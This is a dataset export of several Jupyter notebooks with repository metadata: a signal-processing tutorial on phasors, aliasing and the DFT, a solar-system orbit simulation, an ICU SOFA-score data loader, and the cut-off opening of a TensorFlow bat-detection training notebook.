the left is the phasor diagram: the grey circle represents a phasor with magnitude 1, the red dots represents the points on the circle that the phasor samples between `tmin` and `tmax` given the `sampling_rate`. \n* On the right is the time versus amplitude graph: The grey line shows a continuous sine wave with with frequency `freq`, the magenta dots show the points we actually sample between times `tmin` and `tmax` given the `sampling_rate`. \n\nYou can see that although we sample 64 points for the sine wave, we actually just hit the same 8 values per cycle on the phasor. \n\nIt's clearer when we animate it the phasor in time: ", "_____no_output_____" ] ], [ [ "## Now let's animate it! \n## a helper to draw the 'clockhand' line\nX, Y, n_samples = get_line_coords(Xs, Ys)\n## initialize the animation\nline = phasor.plot([], [], color='b', lw=3)[0]\nsin_t = sinusoid.plot([], [], 'o', color='b')[0]\nfigs = (line, sin_t)\n\nanim = FuncAnimation(\n fig, lambda x: anim_sinusoid(x, X=X, Y=Y, tsteps=tsteps, figs=figs), interval=600, frames=n_samples)\n \nHTML(anim.to_html5_video())\n", "_____no_output_____" ] ], [ [ "\n### Exercise \nChange the `freq` variable in the code below to investigate: \n\n* What happens when the sine wave frequency (cycles/second) `freq` is set to `sampling_rate/2`?\n* What happens when the frequency `freq` approaches the half the `sampling_rate`? \n* What happens when the frequency `freq` equals the half the `sampling_rate`? \n* What happens when the frequency `freq` is greater than `sampling_rate/2`", "_____no_output_____" ] ], [ [ "## Example: Play around with these values\nTmax = 1\nTmin = 0\n\nfreq = 15 # cycles/second\nsampling_rate = 16 # f_s above\nt_step=1/sampling_rate\n\nprint(\"freq=%.2f cycles/sec, sampling rate=%.2f samples/sec, sampling period=%.2f sec\" % (freq, sampling_rate, t_step) )\n\n## Get our complex values corresponding to the sine wave\nzs, thetas, tsteps = gen_phasor_vals_freq(Tmin=Tmin, Tmax=Tmax, t_step=t_step, freq=freq)\n\n## Project to real and imaginary parts for plotting\nXs = np.real(zs)\nYs = np.imag(zs)\n\n## generate the background\nfig, phasor, sinusoid = create_anim_bkg(tsteps, thetas, freq)\n\n## Plot the phasor samples\nphasor.scatter(Xs, Ys)\nphasor.set_xlabel(\"Real values\")\nphasor.set_ylabel(\"Imaginary values\")\n\n## Plot our actual sampled sine wave in magenta\nsinusoid.plot(tsteps, Ys, 'o-', color='magenta')\nsinusoid.set_xlabel(\"Time (s)\")\nsinusoid.set_ylabel(\"Amplitude\")\n\n## Animate the phasor and sinusoid\nX, Y, n_samples = get_line_coords(Xs, Ys)\n\nline = phasor.plot([], [], color='b', lw=3)[0]\nsin_t = sinusoid.plot([], [], 'o', color='b')[0]\nfigs = (line, sin_t)\nanim = FuncAnimation(\n fig, lambda x: anim_sinusoid(x, X=X, Y=Y, tsteps=tsteps, figs=figs), interval=600, frames=n_samples)\n \nHTML(anim.to_html5_video())\n", "_____no_output_____" ] ], [ [ "### Notes\n", "_____no_output_____" ], [ "## Aliasing\n\nIf you change the frequency (`freq`) for the phasor to be higher than half the sampling rate , you'll see that the actual frequency of the sinusoid doesn't actually keep getting higher. In fact, with `freq=8` the sine wave (i.e. projection of the vertical (imaginary) component) doesn't appear to have any amplitude modulation at all. However, keen readers will note that for `sampling_rate=16` and `freq=8` in the example above, the real projection (i.e. cosine) would show amplitude modulations since $\\cos(t)$ is 90 degree phase shifted relative to $\\sin(t)$. The phasor `freq=15` appears to complete only one cycle per second, just like for `freq=1`, but appears to rotating the opposite way. \n\nThese are examples of **aliasing**: given a specific sampling rate there is a limit to which we can distinguish different frequencies because we simply can't take enough samples to show the difference! \n\nIn the example above, even though we are sampling from a 15 Hz wave for `freq=15`, we only get one sample per cycle and the overall sampled sequence looks like a 1 Hz wave. So, the fact that the phasor appears to rotate the opposite way to `freq=1` is because it's actually just the 15th step of the `freq=1` phasor. \n\n<div class=\"alert alert-success\">\nIn general, with a sampling rate of $f_s$ we can't distinguish between a sine wave of frequency $f_0$ and a sine wave of $f_0 + kf_s$ for any integer $k$.\n</div>\n\nThis means that we can't actually tell the frequency of the underlying waveform based on the sample amplitudes alone. \n\nThe practical upshot of this is that for sampling rate $f_s$, the highest frequency we can actually sample is $f_s/2$, the **Nyquist Frequency**. This is one of the most important concepts in digital signal processing and will effect pretty much all the methods we use. It's why we see the mirroring effect in [the DFT output spectrum](./signals-1-1-interpreting-the-discrete-fourier-transform.ipynb). So, if you remember just one thing, remember this! \n\n", "_____no_output_____" ], [ "## Superposition\n\nThis use of phasors to represent sinusoids may seem excessively complex at the moment, but it actually gives us a nice way of visualizing what happens when we add two sine waves together, i.e. linear superposition. \n\nWe've seen how the Fourier Transform gives us a way of breaking down periodic waveforms (no matter how complicated) into a linear combination of sinusoids (cosine waves, specifically). But if you've seen the actual DFT equations, you'll have noticed that each DFT output is actually is described in terms of phasors of specific frequencies (e.g. sums over $e^{-j \\theta}$ values). We can now get at least a visual idea of what this means.\n\nLet's look at how can combining phasors can let us define complicated waveforms in a simple manner. \n", "_____no_output_____" ], [ "### Magnitude and Phase Modifications\nFirst, let's note that we can easily change the magnitude and phase of a sine wave before adding it to others to make a complex waveform. \n\n* We can change the magnitude of a sinusoidal component by multiplying all the values of that sinusoid by a scalar $r$.\n\n* We can apply a phase shift of $\\phi$ radians to $\\sin(\\theta)$ to gives us a sine wave of the form: $\\sin(\\theta + \\phi)$. It basically means we start our cycles around the unit circle at $e^{i\\phi}$ instead of at $e^{i0} = 1 + i0 \\mapsto (1,0)$ ", "_____no_output_____" ], [ "### Generating linear combinations of sinusoids\n\nLet's plot some combinations of sinusoids.\n\nFirst let's set the sampling rate and the start and end times of the sequence we're going to generate:", "_____no_output_____" ] ], [ [ "## Some parameters to play with \nTmax = 2\nTmin = 0\n\nsampling_rate = 16\nt_step=1/sampling_rate", "_____no_output_____" ] ], [ [ "Now, let's create some phasors with different magnitudes, frequencies and phases. Here we create 2 phasors with magnitude 1 and no phase shift, one with `freq=2` Hz and another phasor with frequency `2*freq`. \n\nWe then add the two phasors values together at each timestep (`zs_sum` in the code below): ", "_____no_output_____" ] ], [ [ "## Define a bunch of sinusoids. We can do this in terms of 3 parameters: \n## (magnitude, frequency, phase)\n\n## The following defines two sinusoids, both with magnitude (peak amplitude) 1 and the same phase (no phase shift) \n## The second has double the frequency of the first:\nfreq=2\nparams = [(1, freq, 0), (1, 2*freq, 0)] \n\n## Later: change these values and see what happens, e.g. \n#params = [(1, freq, 0), (0.4, 5*freq, 0), (0.4, 5*freq, np.pi)] \n\nphasor_list = []\ntheta_list = []\ntsteps_list = []\n\n## Generate a list of phasors for each set of (mag, freq, phase) parameters\nfor mag, freq, phase in params: \n ## Generate a phasor with frequency freq\n ## zs are the phasor values\n ## thetas are the corresponding angles for each value in zs\n ## tsteps are the corresponding time steps for each value in zs\n zs, thetas, tsteps = gen_phasor_vals_freq(Tmin=Tmin, Tmax=Tmax, t_step=t_step, freq=freq) \n \n ## Apply the phase_shift \n phase_shift = np.exp(1j*phase)\n \n ## scale by the magnitude mag - changes the peak amplitude\n zs = mag*zs*phase_shift\n \n ## Append the phasor to a list\n phasor_list.append(zs)\n \n ## The angle sequence and time sequence in case you want to inspect them\n ## We don't actually use them below\n theta_list.append(thetas)\n tsteps_list.append(tsteps)\n\n## Superposition: add the individual phasors in the list together (all with the same weights right now)\nzs_sum = np.zeros(len(tsteps_list[0]))\nfor z in phasor_list: \n zs_sum = zs_sum + z", "_____no_output_____" ] ], [ [ "Now, we can plot the sine (vertical) component of the individual phasors (on the right), ignoring the cosine (horizontal) component for the moment. ", "_____no_output_____" ] ], [ [ "## Plot the phasor (left) and the projection of the imaginary (vertical) component (right)\n## cosproj would be the projection to the real axis, but let's just ignore that for now\n\nfig, phasor, sinproj, cosproj = create_phasor_sinusoid_bkg(Tmin, Tmax, ymax=3, plot_phasor=True, plot_real=False, plot_imag=True,)\n\ndense_tstep=0.001\nfor mag, freq, phase in params: \n ## We just want to plot the individual sinusoids (time v amplitude), so we ignore \n ## the complex numbers we've been using to plot the phasors\n _, dense_thetas, dense_tsteps = gen_phasor_vals_freq(Tmin, Tmax, dense_tstep, freq) \n sinproj.plot(dense_tsteps, mag*np.sin(dense_thetas+phase), color='grey')", "_____no_output_____" ] ], [ [ "Now plot the sum of the phasors (left) and the projected imaginary component in magenta (right) - that is, the sum of the sine components (in grey)", "_____no_output_____" ] ], [ [ "## Plot sinusoids as sampled\nXlist = []\nYlist = []\n\n## some hacks to get to represent the individual phasors as lines from the centre of a circle as well as points\nfor i, zs in enumerate(phasor_list):\n Xs_ = np.real(zs)\n Ys_ = np.imag(zs)\n X_, Y_, _ = get_line_coords(Xs_, Ys_)\n Xlist.append(X_)\n Ylist.append(Y_)\n\n## Project the real and imaginary parts of the timewise summed phasor values\nXs = np.real(zs_sum)\nYs = np.imag(zs_sum)\nXline, Yline, _ = get_line_coords(Xs, Ys)\n\n## plot the summed phasor values as 2-d coordinates (left)\n\n## plot the sine projection of the phasor values in time (right)\nsinproj.plot(tsteps_list[0], Ys, color='magenta')\nfig", "_____no_output_____" ] ], [ [ "Now let's see an animation of how we're adding these phasors together! ", "_____no_output_____" ] ], [ [ "anim = get_phasor_animation(Xline, Yline, tsteps, phasor, sinproj, cosproj, fig, Xlist=Xlist, Ylist=Ylist, params=params)\nanim", "_____no_output_____" ] ], [ [ "In the animation above you should see: \n* the red circle represents the first phasor (`freq=2`)\n* the blue circle represents the 2nd phasor (`freq=4`)\n* In adding the the two phasors together, we add the corresponding vectors for each phasor at each point in time. ", "_____no_output_____" ], [ "### Exercise:\n\n\n* What happens when you add up two sinusoids with the same frequency but different magnitudes\n * e.g. `params = [(1, freq, 0), (2, freq, 0)]`\n \n \n* What happens when you change the phase? \n * Can you find $\\phi$ such that $\\sin(\\theta+\\phi) = \\cos(\\theta)$ ? \n \n \n* When do the individual sinusoids cancel each other out? \n\n\n* Assume you have a compound sinusoid defined by the following params: \n * `params = [(1, freq, 0), (0.4, 5*freq, 0)]` \n * What sinusoid could you add to cancel the higher frequency component out while keeping the lower frequency one? \n", "_____no_output_____" ], [ "### Notes\n", "_____no_output_____" ], [ "## Maths Perspective: The DFT equation as a sum of phasors\n\nNow if you look at the mathematical form of the DFT, you can start to recognize this as representing a sequence of phasors of different frequencies, which have a real (cosine) and imaginary (sine) component. \n\nThe DFT is defined as follows:\n\n* For input: $x[n]$, for $n=0..N-1$ (i.e. a time series of $N$ samples)\n* We calculate an output of N complex numbers $\\mapsto$ magnitude and phases of specific phasors:\n\nWhere the $k$th output, DFT[k], is calculated using the following equation: \n$$ \n\\begin{align}\nDFT[k] &= \\sum_{n=0}^{N-1} x[n] e^{-j \\frac{2\\pi n}{N} k} \\\\\n\\end{align}\n$$\n\nWhich is equivalent to the following (using Euler's rule):\n\n$$\n\\begin{align}\nDFT[k] &= \\sum_{n=0}^{N-1} x[n]\\big[\\cos(\\frac{2\\pi n}{N} k) - j \\sin(\\frac{2\\pi n}{N} k) \\big] \n\\end{align}\n$$\n\nThis basically says that each DFT output is the result of multiplying the $n$th input value $x[n]$ with the $n$th sample of a phasor (hence sine and cosine waves) of a specific frequency, and summing the result (hence the complex number output). The frequency of DFT[k] is $k$ times the frequency of DFT[1], where the frequency of DFT[1] depends on the input size $N$ and the sampling rate (as discussed the [this notebook](./signals-1-1-interpreting-the-discrete-fourier-transform.ipynb)). The sampling rate determines the time each phasor step takes, hence how much time it takes to make a full phasor cycle, hence what frequencies we can actually compare the input against. \n\nThe pointwise multiplication and summation is also known as a dot product (aka inner product). The dot product between two vectors tells us how similar those two vectors are. So in a very rough sense, the DFT 'figures out' which frequency components are present in the input, by looking at how similar the input is to each of the N phasors represented in the DFT output. \n\nThere are two more notebooks on the DFT for this module, but both are extension material (not essential).\n\n* [This notebook](./signals-1-3-discrete-fourier-transform-in-detail.ipynb) goes into more maths details but is purely extension (you can skip)\n* [This notebook](./signals-1-4-more-interpreting-the-dft.ipynb) looks at a few more issues in interpreting the DFT\n\nSo, you can look at those if you want more details. Otherwise, we'll move onto the source-filter model in the second signals lab! \n", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown" ] ]
cb1f3e1f9749d40ff8cef6a33fcfe07070774ab7
10,817
ipynb
Jupyter Notebook
notebooks/optimization_problem.ipynb
englhardt/ocs-evaluation
b1c1f33b44a3aa1ca6958d2efef91c69efcc60df
[ "MIT" ]
null
null
null
notebooks/optimization_problem.ipynb
englhardt/ocs-evaluation
b1c1f33b44a3aa1ca6958d2efef91c69efcc60df
[ "MIT" ]
4
2021-02-05T21:20:09.000Z
2021-08-05T09:36:23.000Z
notebooks/optimization_problem.ipynb
englhardt/ocs-evaluation
b1c1f33b44a3aa1ca6958d2efef91c69efcc60df
[ "MIT" ]
1
2022-01-28T02:46:41.000Z
2022-01-28T02:46:41.000Z
34.559105
198
0.514468
[ [ [ "empty" ] ] ]
[ "empty" ]
[ [ "empty" ] ]
cb1f51b6056c33b61f1700ee1cf8a271c18351b4
26,594
ipynb
Jupyter Notebook
solarsystem2.ipynb
jeplerucsc/astr-119-session-16
93346992b9169bc5c19d6d69ded079d1e66d6909
[ "MIT" ]
null
null
null
solarsystem2.ipynb
jeplerucsc/astr-119-session-16
93346992b9169bc5c19d6d69ded079d1e66d6909
[ "MIT" ]
null
null
null
solarsystem2.ipynb
jeplerucsc/astr-119-session-16
93346992b9169bc5c19d6d69ded079d1e66d6909
[ "MIT" ]
null
null
null
50.751908
2,537
0.542152
[ [ [ "%matplotlib inline\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom collections import namedtuple", "_____no_output_____" ], [ "class planet():\n \"A planet in our solar system\"\n def __init__(self,semimajor,eccentricity):\n self.x = np.zeros(2) #x and y position\n self.v = np.zeros(2) #x and y velocity\n self.a_g = np.zeros(2) #x and y acceleration\n self.t = 0.0 #current time\n self.dt = 0.0 #current timestep\n self.a = semimajor #semimajor axis of the orbit\n self.e = eccentricity #eccentricity of the orbit\n self.istep = 0 #current integer timestep1\n self.name = \"\" #name for the planet", "_____no_output_____" ], [ "solar_system = { \"M_sun\":1.0, \"G\":39.4784176043574320}", "_____no_output_____" ], [ "def SolarCircularVelocity(p):\n \n G = solar_system[\"G\"]\n M = solar_system[\"M_sun\"]\n r = (p.x[0]**2 + p.x[1]**2)**0.5\n \n #return the circular velocity\n return (G*M/r)**0.5", "_____no_output_____" ], [ "def SolarGravitationalAcceleration(p):\n \n G = solar_system[\"G\"]\n M = solar_system[\"M_sun\"]\n r = (p.x[0]**2 + p.x[1]**2)**0.5\n \n #acceleration in AU/yr/yr\n a_grav = -1.0*G*M/r**2\n \n #find the angle at this position\n if(p.x[0]==0.0):\n if(p.x[1]>0.0):\n theta = 0.5*np.pi\n else:\n theta = 1.5*np.pi\n else:\n theta = np.arctan2(p.x[1],p.x[0])\n \n #set the x and y components of the velocity\n #p.a_g[0] = a_grav * np.cos(theta)\n #p.a_g[1] =a_grav * np.sin(theta)\n return a_grav*np.cos(theta), a_grav*np.sin(theta)", "_____no_output_____" ], [ "def calc_dt(p):\n\n #integration tolerance\n ETA_TIME_STEP = 0.0004\n \n #compute timestep\n eta = ETA_TIME_STEP\n v = (p.v[0]**2 + p.v[1]**2)**0.5\n a = (p.a_g[0]**2 + p.a_g[1]**2)**0.5\n dt = eta * np.fmin(1./np.fabs(v),1./np.fabs(a)**0.5)\n \n return dt", "_____no_output_____" ], [ "def SetPlanet(p, i):\n \n AU_in_km = 1.495979e+8 #an AU in km\n \n #circular velocity\n v_c = 0.0 #circular velocity in AU/yr\n v_e = 0.0 #velocity at perihelion in AU/yr\n \n #planet-by planet initial conditions\n \n #Mercury\n if(i==0):\n #semi-major axis in AU\n p.a = 57909227.0/AU_in_km\n \n #eccentricity\n p.e = 0.20563593\n \n #name\n p.name = \"Mercury\"\n \n #Venus\n elif(i==1):\n #semi-major axis in AU\n p.a = 108209475.0/AU_in_km\n \n #eccentricity\n p.e = 0.00677672\n \n #name\n p.name = \"Venus\"\n \n #Earth\n elif(i==2):\n #semi-major axis in AU\n p.a = 1.0\n \n #eccentricity\n p.e = 0.01671123\n \n #name\n p.name = \"Earth\"\n \n #set remaining properties\n p.t = 0.0\n p.x[0] = p.a*(1.0-p.e)\n p.x[1] = 0.0\n \n #get equiv circular velocity\n v_c = SolarCircularVelocity(p)\n \n #velocity at perihelion\n v_e = v_c*(1 + p.e)**0.5\n \n #set velocity\n p.v[0] = 0.0 #no x velocity at perihelion\n p.v[1] = v_e #y velocity at perihelion (counter clockwise)\n \n #calculate gravitational acceleration from Sun\n p.a_g = SolarGravitationalAcceleration(p)\n \n #set timestep\n p.dt = calc_dt(p)", "_____no_output_____" ], [ "def x_first_step(x_i, v_i, a_i, dt):\n #x_1/2 = x_0+ 1/2 v_0 Delta_t + 1/4 a_0 Delta t^2\n return x_i + 0.5*v_i*dt + 0.25*a_i*dt**2", "_____no_output_____" ], [ "def v_full_step(v_i,a_ipoh,dt):\n #v_i+1 = v_i + a_i+1/2 Delta t\n return v_i + a_ipoh*dt;", "_____no_output_____" ], [ "def x_full_step(x_ipoh, v_ipl, a_ipoh, dt):\n #x_3/2 = x_1/2 + v_i+1 Delta t\n return x_ipoh + v_ipl*dt;", "_____no_output_____" ], [ "def SaveSolarSystem(p, n_planets, t, dt , istep, ndim):\n \n #loop over the number of planets\n for i in range(n_planets):\n \n #define a filename\n fname = \"planet.%s.txt\" % p[i].name\n \n if(istep==0):\n #create the file on the first timestep\n fp = open(fname,\"w\")\n else:\n #append the file on subsequent timesteps\n fp = open(fname,\"a\")\n \n #compute the drifted properties of the planet\n v_drift = np.zeros(ndim)\n \n for k in range(ndim):\n v_drift[k] = p[i].v[k] + 0.5*p[i].a_g[k]*p[i].dt\n \n #write the data to file\n s = \"%6d\\t%6.5f\\t%6.5f\\t%6d\\t%6.5f\\t%6.5f\\t%6.5f\\t%6.5ft\\%6.5f\\t%6.5f\\t%6.5f\\t%6.5fn\" % \\\n (istep,t,dt,p[i].istep,p[i].t,p[i].dt,p[i].x[0],p[i].x[1],v_drift[0],v_drift[1],p[i].a_g[0],p[i].a_g[1])\n fp.write(s)\n \n #close the file\n fp.close()", "_____no_output_____" ], [ "def EvolveSolarSystem(p,n_planets,t_max):\n #number of spatial dimensions\n ndim = 2\n \n #define the first timestep\n dt = 0.5/265.25\n \n #define the starting time\n t = 0.0\n \n #define the starting timestep\n istep = 0\n \n #save the initial conditions\n SaveSolarSystem(p,n_planets,t,dt,istep,ndim)\n \n #begin a loop over the global timescale\n while(t<t_max):\n \n #check to see if the next step exceeds the\n #maximum time. If so, take a smaller step\n if(t+dt>t_max):\n dt = t_max - t #limit the step to align with t_max\n \n #evolve each planet\n for i in range(n_planets):\n \n while(p[i].t<t+dt):\n \n #special case for istep==0\n if(p[i].istep==0):\n \n #take the first step according to a verlet scheme\n for k in range(ndim):\n p[i].x[k] = x_first_step(p[i].x[k],p[i].v[k],p[i].a_g[k],p[i].dt)\n \n #update the acceleration\n p[i].a_g = SolarGravitationalAcceleration(p[i])\n \n #update the time by 1/2dt\n p[i].t += 0.5*p[i].dt\n \n #update the timestep\n p[i].dt = calc_dt(p[i])\n \n #continue with a normal step\n \n #limit to align with the global timestep\n if(p[i].t + p[i].dt > t+dt):\n p[i].dt = t+dt-p[i].t\n \n #evolve the velocity\n for k in range(ndim):\n p[i].v[k] = v_full_step(p[i].v[k],p[i].a_g[k],p[i].dt)\n \n #evolve the position\n for k in range(ndim):\n p[i].x[k] = x_full_step(p[i].x[k],p[i].v[k],p[i].a_g[k],p[i].dt)\n \n #update the acceleration\n p[i].a_g = SolarGravitationalAcceleration(p[i])\n \n #update by dt\n p[i].t += p[i].dt\n \n #compute the new timestep\n p[i].dt = calc_dt(p[i])\n \n #update the planet's timestep\n p[i].istep+=1\n \n #now update the global system time\n t+=dt\n \n #update the global step number\n istep += 1\n \n #output the current state\n SaveSolarSystem(p,n_planets,t,dt,istep,ndim)\n \n #print the final steps and time\n print(\"Time t = \",t)\n print(\"Maximum t = \", t_max)\n print(\"Maximum number of steps = \", istep)\n \n #end of evolution", "_____no_output_____" ], [ "def read_twelve_arrays(fname):\n fp = open(fname,\"r\")\n fl = fp.readlines()\n n = len(fl)\n a = np.zeros(n)\n b = np.zeros(n)\n c = np.zeros(n)\n d = np.zeros(n)\n f = np.zeros(n)\n g = np.zeros(n)\n h = np.zeros(n)\n j = np.zeros(n)\n k = np.zeros(n)\n l = np.zeros(n)\n m = np.zeros(n)\n p = np.zeros(n)\n for i in range(n):\n a[i] = float(fl[i].split()[0])\n b[i] = float(fl[i].split()[1])\n c[i] = float(fl[i].split()[2])\n d[i] = float(fl[i].split()[3])\n f[i] = float(fl[i].split()[4])\n g[i] = float(fl[i].split()[5])\n h[i] = float(fl[i].split()[6])\n j[i] = float(fl[i].split()[7])\n k[i] = float(fl[i].split()[8])\n l[i] = float(fl[i].split()[9])\n m[i] = float(fl[i].split()[10])\n p[i] = float(fl[i].split()[11])\n \n return a,b,c,d,f,g,h,j,k,l,m,p\n ", "_____no_output_____" ], [ "#set the number of planets\nn_planets = 3\n\n#set the maxmimum time of the simulation\nt_max = 2.0\n\n#create empty list of planets\np = []\n\n#set the planets\nfor i in range(n_planets):\n \n #create an empty planet\n ptmp = planet(0.0,0.0)\n \n #set the planet properties\n SetPlanet(ptmp,i)\n \n #remember the planet\n p.append(ptmp)\n \n#evolve the solar system\nEvolveSolarSystem(p,n_planets,t_max)", "Time t = 2.0018850141376423\nMaximum t = 2.0\nMaximum number of steps = 1062\n" ], [ "fname = \"planet.Mercury.txt\"\nistepMg,tMg,dtMg,istepM,tM,dtM,xM,yM,vxM,vyM,axM,ayM = read_twelve_arrays(fname)", "_____no_output_____" ], [ "fname = \"planet.Earth.txt\"\nistepEg,tEg,dtEg,istepE,tE,dtE,xE,yE,vxE,vyE,axE,ayE = read_twelve_arrays(fname)", "_____no_output_____" ], [ "fname = \"planet.Venus.txt\"\nistepVg,tVg,dtVg,istepV,tV,dtV,xV,yV,vx,vyV,axV,ayV = read_twelve_arrays(fname)", "_____no_output_____" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ] ]
cb1f678c4d6800b9c560560fcd92c028b96c69ac
4,195
ipynb
Jupyter Notebook
sepsis/extract_data.ipynb
yinchangchang/AmsterdamUMCdb
3ea8b852198f00a869f7e7d1b7c342062d90a42e
[ "MIT" ]
1
2021-02-03T13:38:07.000Z
2021-02-03T13:38:07.000Z
sepsis/extract_data.ipynb
yinchangchang/AmsterdamUMCdb
3ea8b852198f00a869f7e7d1b7c342062d90a42e
[ "MIT" ]
null
null
null
sepsis/extract_data.ipynb
yinchangchang/AmsterdamUMCdb
3ea8b852198f00a869f7e7d1b7c342062d90a42e
[ "MIT" ]
null
null
null
35.252101
597
0.647199
[ [ [ "<img src=\"../../img/logo_amds.png\" alt=\"Logo\" style=\"width: 128px;\"/>\n\n# AmsterdamUMCdb - Freely Accessible ICU Database\n\nversion 1.0.2 March 2020 \nCopyright &copy; 2003-2020 Amsterdam UMC - Amsterdam Medical Data Science", "_____no_output_____" ], [ "## Sequential Organ Failure Assessment (SOFA)\nThe sequential organ failure assessment score (SOFA score), originally published as as the Sepsis-related Organ Failure Assessment score ([Vincent et al., 1996](http://link.springer.com/10.1007/BF01709751)), is a disease severity score designed to track the severity of critical ilness throughout the ICU stay. In contrast to APACHE (II/IV), which only calculates a score for the first 24 hours, it can be used sequentially for every following day. The code performs some data cleanup and calculates the SOFA score for the first 24 hours of ICU admission for all patients in the database.\n\n**Note**: Requires creating the [dictionaries](../../dictionaries/create_dictionaries.ipynb) before running this notebook.", "_____no_output_____" ], [ "## Imports", "_____no_output_____" ] ], [ [ "%matplotlib inline\nimport amsterdamumcdb\nimport psycopg2\nimport pandas as pd\nimport numpy as np\nimport re\n\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nimport matplotlib as mpl\n\nimport io\nfrom IPython.display import display, HTML, Markdown", "_____no_output_____" ], [ "sofa = pd.read_csv('sofa/sofa.csv')\noxy_flow = pd.read_csv(\"sofa/oxy_flow.csv\" )\nsofa_respiration = pd.read_csv(\"sofa/sofa_respiration.csv\" )\nsofa_platelets = pd.read_csv(\"sofa/sofa_platelets.csv\" )\nsofa_bilirubin = pd.read_csv(\"sofa/sofa_bilirubin.csv\" )\nsofa_cardiovascular = pd.read_csv(\"sofa/sofa_cardiovascular.csv\" )\nmean_abp = pd.read_csv(\"sofa/mean_abp.csv\" )\nsofa_cardiovascular_map = pd.read_csv(\"sofa/sofa_cardiovascular_map.csv\" )\ngcs = pd.read_csv(\"sofa/gcs.csv\" )\nsofa_cns = pd.read_csv(\"sofa/sofa_cns.csv\" )\nsofa_renal_urine_output = pd.read_csv(\"sofa/sofa_renal_urine_output.csv\" )\nsofa_renal_daily_urine_output = pd.read_csv(\"sofa/sofa_renal_daily_urine_output.csv\" )\ncreatinine = pd.read_csv(\"sofa/creatinine.csv\" )\nsofa_renal_creatinine = pd.read_csv(\"sofa/sofa_renal_creatinine.csv\" )\nsofa_renal = pd.read_csv(\"sofa/sofa_renal.csv\" )", "_____no_output_____" ], [ "'''\n\nbloc,icustayid,charttime,gender,age,elixhauser,re_admission,died_in_hosp,died_within_48h_of_out_time,\nmortality_90d,delay_end_of_record_and_discharge_or_death,\n\nWeight_kg,GCS,HR,SysBP,MeanBP,DiaBP,RR,SpO2,Temp_C,FiO2_1,Potassium,Sodium,Chloride,Glucose,\nBUN,Creatinine,Magnesium,Calcium,Ionised_Ca,CO2_mEqL,SGOT,SGPT,Total_bili,Albumin,Hb,WBC_count,\nPlatelets_count,PTT,PT,INR,Arterial_pH,paO2,paCO2,Arterial_BE,Arterial_lactate,HCO3,mechvent,\nShock_Index,PaO2_FiO2,median_dose_vaso,max_dose_vaso,input_total,\ninput_4hourly,output_total,output_4hourly,cumulated_balance,SOFA,SIRS\n\n'''", "_____no_output_____" ] ] ]
[ "markdown", "code" ]
[ [ "markdown", "markdown", "markdown" ], [ "code", "code", "code" ] ]
cb1f6ca23ab0c1dba7084b43f9f22b41a3ca79f5
29,591
ipynb
Jupyter Notebook
object_detection_for_image_cropping/chiroptera/chiroptera_train_tf2_ssd_rcnn.ipynb
aubricot/computer_vision_with_eol_images
33f5df56568992b01ad953364c77f9fd0a977b2f
[ "MIT" ]
4
2020-06-02T19:01:23.000Z
2021-06-01T20:01:29.000Z
object_detection_for_image_cropping/chiroptera/chiroptera_train_tf2_ssd_rcnn.ipynb
aubricot/computer_vision_with_eol_images
33f5df56568992b01ad953364c77f9fd0a977b2f
[ "MIT" ]
null
null
null
object_detection_for_image_cropping/chiroptera/chiroptera_train_tf2_ssd_rcnn.ipynb
aubricot/computer_vision_with_eol_images
33f5df56568992b01ad953364c77f9fd0a977b2f
[ "MIT" ]
2
2020-06-02T21:49:00.000Z
2021-04-21T07:42:30.000Z
42.454806
320
0.545909
[ [ [ "<a href=\"https://colab.research.google.com/github/aubricot/computer_vision_with_eol_images/blob/master/object_detection_for_image_cropping/chiroptera/chiroptera_train_tf2_ssd_rcnn.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>", "_____no_output_____" ], [ "# Train Tensorflow Faster-RCNN and SSD models to detect bats (Chiroptera) from EOL images\n--- \n*Last Updated 19 Oct 2021* \n-Now runs in Python 3 with Tensorflow 2.0- \n\nUse EOL user generated cropping coordinates to train Faster-RCNN and SSD Object Detection Models implemented in Tensorflow to detect bats from EOL images. Training data consists of the user-determined best square thumbnail crop of an image, so model outputs will also be a square around objects of interest.\n\nDatasets were downloaded to Google Drive in [chiroptera_preprocessing.ipynb](https://github.com/aubricot/computer_vision_with_eol_images/blob/master/object_detection_for_image_cropping/chiroptera/chiroptera_preprocessing.ipynb).\n\n***Models were trained in Python 2 and TF 1 in Jan 2020: RCNN trained for 2 days to 200,000 steps and SSD for 4 days to 450,000 steps.***\n\nNotes: \n* Before you you start: change the runtime to \"GPU\" with \"High RAM\"\n* Change parameters using form fields on right (/where you see 'TO DO' in code)\n* For each 24 hour period on Google Colab, you have up to 12 hours of free GPU access. \n\nReferences: \n* [Official Tensorflow Object Detection API Instructions](https://tensorflow-object-detection-api-tutorial.readthedocs.io/en/latest/training.html) \n* [Medium Blog on training using Tensorflow Object Detection API in Colab](https://medium.com/analytics-vidhya/training-an-object-detection-model-with-tensorflow-api-using-google-colab-4f9a688d5e8b)", "_____no_output_____" ], [ "## Installs & Imports\n---", "_____no_output_____" ] ], [ [ "# Mount google drive to import/export files\nfrom google.colab import drive\ndrive.mount('/content/drive', force_remount=True)", "_____no_output_____" ], [ "# For running inference on the TF-Hub module\nimport tensorflow as tf\nimport tensorflow_hub as hub\n\n# For downloading and displaying images\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport tempfile\nimport urllib\nfrom urllib.request import urlretrieve\nfrom six.moves.urllib.request import urlopen\nfrom six import BytesIO\n\n# For drawing onto images\nfrom PIL import Image\nfrom PIL import ImageColor\nfrom PIL import ImageDraw\nfrom PIL import ImageFont\nfrom PIL import ImageOps\n\n# For measuring the inference time\nimport time\n\n# For working with data\nimport numpy as np\nimport pandas as pd\nimport os\nimport csv\n\n# Print Tensorflow 